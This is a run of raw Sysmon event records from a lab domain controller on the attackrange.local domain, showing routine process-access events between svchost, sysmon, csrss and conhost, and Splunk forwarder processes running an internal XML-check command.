13:55:56.494{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007509Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.494{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007508Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007507Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007506Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007505Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007504Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007503Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85EC-5FCF-3D01-000000009101}744C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007502Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-85EC-5FCF-3C01-000000009101}6684400C:\Windows\system32\cmd.exe{10ACEC4A-85EC-5FCF-3D01-000000009101}744C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007501Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.493{10ACEC4A-85EC-5FCF-3D01-000000009101}744C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{10ACEC4A-85EC-5FCF-3C01-000000009101}668C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 10341000x80000000000000007500Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EC-5FCF-3C01-000000009101}668C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007499Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007498Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007497Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007496Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007495Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007494Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007493Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007492Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007491Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007490Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85EC-5FCF-3C01-000000009101}668C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007489Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.478{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85EC-5FCF-3C01-000000009101}668C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+eef54|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ebd46|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007488Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.487{10ACEC4A-85EC-5FCF-3C01-000000009101}668C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007487Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.447{10ACEC4A-85EC-5FCF-3B01-000000009101}41564172C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007486Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.213{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EC-5FCF-3B01-000000009101}4156C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007485Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007484Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.213{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007483Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 